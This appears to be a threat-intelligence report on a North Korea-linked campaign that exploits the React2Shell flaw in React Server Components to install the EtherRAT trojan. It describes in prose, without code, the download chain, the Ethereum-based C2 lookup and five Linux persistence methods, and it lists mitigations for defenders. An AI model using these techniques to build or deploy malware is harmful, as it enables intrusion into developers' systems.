Full Report
Threat actors with ties to North Korea have likely become the latest to exploit the recently disclosed critical security React2Shell flaw in React Server Components (RSC) to deliver a previously undocumented remote access trojan dubbed EtherRAT. "EtherRAT leverages Ethereum smart contracts for command-and-control (C2) resolution, deploys five independent Linux persistence mechanisms, and
Analysis Summary
# Threat Actor: North Korea-linked Actors (Associated with Contagious Interview)
## Attribution & Identity
* **Attribution:** Threat actors with ties to North Korea.
* **Known Aliases/Associated Groups:** Associated with the long-running campaign codenamed **Contagious Interview**.
## Activity Summary
These actors are exploiting the recently disclosed critical security flaw, **React2Shell (CVE-2025-55182)**, in React Server Components (RSC). This activity shows significant overlap with the Contagious Interview campaign, which historically targets blockchain and Web3 developers. The campaign involves using fake job interviews, coding assignments, and video assessments as a ruse to deploy malware, often initiated via platforms like LinkedIn, Upwork, or Fiverr.
## Tactics, Techniques & Procedures
* **Initial Access:** Exploitation of **CVE-2025-55182** (React2Shell, CVSS 10.0) in React Server Components (RSC) to execute a file download shell command.
* **Execution/Defense Evasion:**
* Execution begins with a Base64-encoded shell command.
* Uses `curl` to retrieve a shell script, with `wget` and `python3` as fallbacks.
* Downloads and installs Node.js v20.10.0 from `nodejs.org`.
* Writes an encrypted blob and an obfuscated JavaScript dropper to disk.
* Deletes the initial shell script upon completion to minimize forensic traces.
* **Payload Delivery/C2:** Uses the novel **EtherHiding** technique (observed since Feb 2025) to fetch C2 server URLs from Ethereum smart contracts every five minutes.
* **C2 Resolution Mechanism:** Leverages **consensus voting across nine public Ethereum RPC endpoints** to resolve the C2 URL, enhancing resilience against sinkholing or poisoning.
* **Payload Execution:** The dropper decrypts the **EtherRAT** payload using a hard-coded key and spawns it using the downloaded Node.js binary.
* **Command & Control:** Once connected, the malware enters a 500ms polling loop, interpreting responses longer than 10 characters as JavaScript code to be executed.
* **Persistence:** Deploys **five independent Linux persistence mechanisms**:
* Systemd user service
* XDG autostart entry
* Cron jobs
* `.bashrc` injection
* Profile injection
* **Defense Evasion/Maintenance:** Implements a self-update mechanism by sending its source code to an API endpoint, receiving new code, and relaunching a new process with the updated payload.
## Targeting
* **Sectors:** Blockchain and Web3 developers are explicitly mentioned. The campaign targets developers generally leveraging JavaScript and cryptocurrency-centric workflows.
* **Geography:** Not explicitly detailed, but the context implies targeting environments running Linux/Node.js applications.
* **Victims:** Developers lured through fake job opportunities on platforms like LinkedIn, Upwork, or Fiverr.
## Tools & Infrastructure
* **Malware Families Used:** **EtherRAT** (previously undocumented Remote Access Trojan).
* **Infrastructure (C2):** Ethereum smart contracts utilized for dynamic C2 resolution.
* **External Dependencies:** Downloads Node.js runtime v20.10.0 from **nodejs.org**.
* **Forensic Mitigation:** Deletes initial shell scripts; C2 server returns functionally identical but differently obfuscated versions of the payload during updates.
## Implications
The deployment of EtherRAT signifies a highly sophisticated evolution in North Korean threat operations, specifically targeting the software supply chain and leveraging Web3 infrastructure (Ethereum smart contracts) for resilient, difficult-to-track Command and Control. The comprehensive persistence mechanisms ensure long-term access on compromised Linux systems.
## Mitigations
* Strictly vet all package dependencies, especially in environments using JavaScript/Node.js ecosystems (like npm).
* Implement robust monitoring for unauthorized shell script execution or unusual network requests originating from application build/delivery processes.
* Ensure systems have strong, redundant persistence detection mechanisms (monitoring systemd, cron jobs, and shell profile modifications).
* Monitor for unexpected downloads of tools like Node.js binaries outside of standard deployment pipelines.